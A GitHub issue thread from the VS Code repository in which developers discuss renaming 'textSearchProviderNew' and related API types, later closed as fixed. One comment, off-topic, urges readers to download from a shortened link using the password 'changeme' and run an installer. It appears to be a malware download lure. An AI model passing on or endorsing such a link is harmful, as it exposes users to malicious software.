### ISSUE TITLE
Rename 'textSearchProviderNew'

### ISSUE THREAD

**Issue by roblourens** [microsoft/vscode#226813] opened 2024-08-27 17:04 UTC
Testing #226669

I recommend removing the `New` name from types before you start asking extensions to adopt the new API for real, to avoid the pain of handling unnecessary renames

**Comment by andreamah** [comment] 2024-08-27 17:07
The problem is that moving the new APIs to the old names is tricky. `TextSearchResult` and `TextSearchContext` are now classes instead of interfaces. If people need to change the name for that anyways, I'm not sure if it's worth changing over others and making a half-transition.

**Comment by c0ffincolors** [comment] 2024-08-27 17:08
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by roblourens** [comment] 2024-08-27 19:13
That doesn't seem like a problem, the interface doesn't exist at runtime, you can delete or rename old interfaces and expose the new classes without affecting any existing extensions.

**Comment by andreamah** [comment] 2024-08-27 21:59
I think I had difficulty overloading the types when editing https://github.com/microsoft/vscode/blob/main/src/vs/workbench/api/common/extHost.api.impl.ts#L1510.

Is it possible to assign `TextSearchMatch` to either an interface or class here?

**Comment by roblourens** [comment] 2024-08-28 04:00
The interfaces don't show up in extHost.api.impl, plus you can delete the old interfaces.

**Comment by andreamah** [comment] 2024-08-28 19:48
> The interfaces don't show up in extHost.api.impl, plus you can delete the old interfaces.

But I need to state `TextSearchContext` in extHost.api.impl, since it's now a class. But then it overloads the type of `vscode.TextSearchContext`. Would I need to call the old one `TextSearchContextOld`, then?

**Comment by roblourens** [comment] 2024-08-29 03:19
You could delete the old one, since nobody should be writing new code that references it.

**Comment by osortega** [comment] 2024-12-17 23:10
This was fixed on https://github.com/microsoft/vscode/pull/232443
Closing it

**Closed by osortega** 2024-12-17 23:10 UTC
Labels: search, polish, search-api
